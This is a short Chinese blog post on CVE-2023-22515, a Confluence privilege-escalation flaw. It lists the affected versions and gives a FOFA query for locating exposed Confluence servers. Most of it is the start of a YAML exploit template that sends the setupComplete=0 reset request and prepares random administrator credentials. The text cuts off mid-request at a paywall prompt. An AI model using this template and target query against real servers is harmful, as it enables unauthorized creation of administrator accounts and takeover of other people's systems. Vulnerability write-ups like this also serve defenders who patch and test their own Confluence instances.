漏洞描述
CVE-2023-22515 是 Atlassian Confluence 中的一个安全漏洞,允许攻击者在未经授权的情况下提升权限并访问系统资源。影响特定版本的 Atlassian Confluence。攻击者可以通过构造恶意请求绕过身份验证机制,从而获得管理员权限或其他高权限访问。
影响版本
该漏洞影响以下 Confluence 版本:
- Confluence Data Center 和 Server 8.0.0 至 8.5.1
fofa
app="ATLASSIAN-Confluence"
poc yaml格式
variables:
username: "{
{rand_base(10)}}"
password: "{
{rand_base(10)}}"
email: "{
{username}}@{
{password}}"
http:
- raw:
- |
GET /setup/setupadministrator-start.action HTTP/1.1
Host: {
{Hostname}}
- |
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{
{randstr}} HTTP/1.1
Host: {
{Hostname}}
- |
GET /setup/setupadministrator-start.action HTTP/1

最低0.47元/天 解锁文章
1270

被折叠的 条评论
为什么被折叠?



